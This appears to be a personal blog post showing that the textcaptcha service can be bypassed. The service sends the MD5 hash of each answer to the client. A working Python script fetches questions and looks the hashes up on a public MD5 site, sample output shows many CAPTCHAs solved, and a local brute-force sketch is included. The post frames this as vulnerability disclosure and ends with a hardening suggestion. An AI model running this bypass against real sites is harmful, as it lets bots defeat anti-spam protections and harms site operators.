Simple CAPTCHA issue

A friend of mine is working on a CAPTCHA-solving program. I can't go into the details here: it's not my work, so it's not mine to disclose.

This did pique my interest slightly, though. While googling for examples for him to feed into his program, I came across "textcaptcha". The idea is simple: it asks logical questions such as "How many colours in the list purple, penguin, blue, white and red?". The thought is that a computer wouldn't be able to understand the question.

My initial thought was that Google would be smart enough to answer these. To my surprise, it wasn't!

The way the software is used is that you pull down either an XML or a JSON file from the URL, which returns the question and an MD5 hash of the answer. Herein lies the problem.
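To make that flow concrete, here is a minimal sketch (Python 3) of how a site might check a visitor's answer against the hash it received. The function names and the normalisation step (trimming whitespace and lower-casing) are my assumptions for illustration, not something taken from the service's documentation.

```python
import hashlib


def normalise(answer):
    # Assumption: answers are compared case-insensitively and surrounding
    # whitespace is ignored. The real service may define this differently.
    return answer.strip().lower()


def is_correct(user_answer, answer_hash):
    """Return True if the MD5 of the normalised answer equals answer_hash."""
    digest = hashlib.md5(normalise(user_answer).encode("utf-8")).hexdigest()
    return digest == answer_hash


# This hash appears in the sample output further down, where the answer was "2".
print(is_correct(" 2 ", "c81e728d9d4c2f636f067f89cc14862c"))
```

The point to notice is that the check needs nothing secret: anyone holding the hash can run the same comparison against their own guesses.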

Since the questions need to be quick for users to answer, the answers will generally be a single word or number, and the MD5 hashes of such short strings are most likely already cracked and readily available to look up. So I created a small Python script to test this:

#!/usr/bin/python
# Python 2 script; requires the httplib2 package.
import httplib2

def find_between(s, first, last):
    # Return the text between `first` and the next `last`,
    # or an empty string if either marker is missing.
    try:
        start = s.index(first) + len(first)
        end = s.index(last, start)
        return s[start:end]
    except ValueError:
        return ""

# Step 1: fetch a question and the MD5 hash of its answer as XML.
print "[+] Getting Question & answer hash"
resp, content = httplib2.Http().request("http://api.textcaptcha.com/myemail@example.com.xml")
question = find_between(content, "<question>", "</question>")
print "[q]: " + question
qhash = find_between(content, "<answer>", "</answer>")
print "[h]: " + qhash

# Step 2: look the hash up in a public MD5 database and scrape the plaintext.
print "[+] Finding awnser"
h = httplib2.Http(disable_ssl_certificate_validation=True)
resp2, content2 = h.request("https://md5.gromweb.com/?md5=" + qhash)
answer = find_between(content2, "<em class=\"long-content string\">", "</em>")
print "[=]: " + answer

I ran it a few hundred times. Here's a small sample of the output:

root[~]: ./textcaptcha_cracker.py
[+] Getting Question & answer hash
[q]: Stomach, shorts, ant, shorts and ear: how many body parts in the list?
[h]: c81e728d9d4c2f636f067f89cc14862c
[+] Finding awnser
[=]: 2
root[~]: ./textcaptcha_cracker.py
[+] Getting Question & answer hash
[q]: 13 minus four = ?
[h]: 45c48cce2e2d7fbdea1afc51c7c6ad26
[+] Finding awnser
[=]: 9
root[~]: ./textcaptcha_cracker.py
[+] Getting Question & answer hash
[q]: What is thirty nine thousand six hundred and forty five as a number?
[h]: 42b6ab389c4620755da3fcafbaef3faa
[+] Finding awnser
[=]: 39645
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: Church, stomach, shorts, fruit, milk and shorts: how many body parts in the list?
[h]: c4ca4238a0b923820dcc509a6f75849b
[+] Finding awnser
[=]: 1
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: The colour of a white mosquito is?
[h]: d508fe45cecaf653904a0e774084bb5c
[+] Finding awnser
[=]: white
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: What is twenty two thousand seven hundred and sixty six as digits?
[h]: 5774b6bb3970f53874a09e9eec130980
[+] Finding awnser
[=]: 22766
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: What number is 2nd in the series twenty six, eleven, seventeen, 38 and one?
[h]: 6512bd43d9caa6e02c990b0a82652dca
[+] Finding awnser
[=]: 11
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: The brown chin is what colour?
[h]: 6ff47afa5dc7daa42cc705a03fca8a9b
[+] Finding awnser
[=]: brown
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: Thirty seven, seventy eight, fourteen, 100, seven or 54: which of these is the biggest?
[h]: f899139df5e1059396431415e770c6dd
[+] Finding awnser
[=]: 100
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: Which of ninety, sixty five, forty two, seventy six, 54 or forty nine is the highest?
[h]: 8613985ec49eb8f757ae6439e879bb2a
[+] Finding awnser
[=]: 90
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: What is forty thousand one hundred and sixty as digits?
[h]: fcd6ee20a31612b7f2f886ed16348750
[+] Finding awnser
[=]: 40160
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: Enter the number thirteen thousand eight hundred and fifty eight in digits:
[h]: 751d8d469b4f5508690047d65cbdac1b
[+] Finding awnser
[=]: 13858
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: In the number 2252793, what is the 2nd digit?
[h]: c81e728d9d4c2f636f067f89cc14862c
[+] Finding awnser
[=]: 2
root[~]: ./textcaptcha_cracker.py 
[+] Getting Question & answer hash
[q]: Which of seventeen, 26, sixty, 55 or fifteen is the biggest?
[h]: 072b030ba126b2f4b2374f342be9ed44
[+] Finding awnser
[=]: 60

As you can see, it seems to be pretty accurate.
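The online lookup isn't even strictly necessary. Because the answers are so short, the same result can be had by hashing candidate answers locally and comparing. Below is a rough sketch in Python 3; the `crack` helper, the `COLOURS` word list and the upper bound of 100000 are all hypothetical choices of mine, picked only because the samples above are small numbers and colour names.

```python
import hashlib


def md5_hex(text):
    """Return the hex MD5 digest of a text string."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def crack(answer_hash, extra_words=(), max_number=100000):
    """Return the first candidate whose MD5 equals answer_hash, else None.

    Candidate words are tried first, then every integer below max_number.
    """
    for word in extra_words:
        if md5_hex(word) == answer_hash:
            return word
    for n in range(max_number):
        if md5_hex(str(n)) == answer_hash:
            return str(n)
    return None


# Hypothetical word list; a real attempt might add body parts, days, names, etc.
COLOURS = ("white", "brown", "red", "blue", "purple")

# Hashes copied from the sample output above (answers "2" and "11").
print(crack("c81e728d9d4c2f636f067f89cc14862c", COLOURS))
print(crack("6512bd43d9caa6e02c990b0a82652dca", COLOURS))
```

Hashing every number below 100000 takes well under a second on ordinary hardware, so numeric questions offer essentially no protection once the hash is handed to the client.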

I feel the only way to make this more secure would be to ask questions whose answers require multiple words or phrases, as these are less likely to have already been cracked and made available to look up. However, this would hinder usability, though I'm not sure by how much.
